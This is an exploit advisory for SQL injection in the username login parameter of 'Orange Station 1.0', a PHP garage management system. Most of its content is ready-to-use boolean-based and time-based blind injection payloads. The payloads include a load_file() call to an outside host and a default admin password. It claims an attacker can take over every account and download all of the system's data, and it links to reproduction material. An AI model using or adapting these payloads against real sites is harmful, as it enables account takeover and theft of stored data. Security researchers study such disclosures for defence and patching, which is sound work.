## Title: Orange Station 1.0 SQLi ## Author: nu11secur1ty ## Date: 0.16.2022 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Orange-Station-1.0 ## Description: The `username` parameter appears to be vulnerable to SQL injection attacks. The attacker can take administrator accounts control and also of all accounts, also the malicious user can download all information about this system. Status: CRITICAL [+] Payloads: ```mysql --- Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: username=mayuri.infospace@gmail.com'+(select load_file('\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb'))+'' OR NOT 8287=8287 AND 'jOHi'='jOHi&password=rootadmin&login= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=mayuri.infospace@gmail.com'+(select load_file('\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb'))+'' AND (SELECT 3074 FROM (SELECT(SLEEP(15)))cvLH) AND 'yPPS'='yPPS&password=rootadmin&login= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Orange-Station-1.0) ## Proof and Exploit: [href](https://streamable.com/sz3tfi)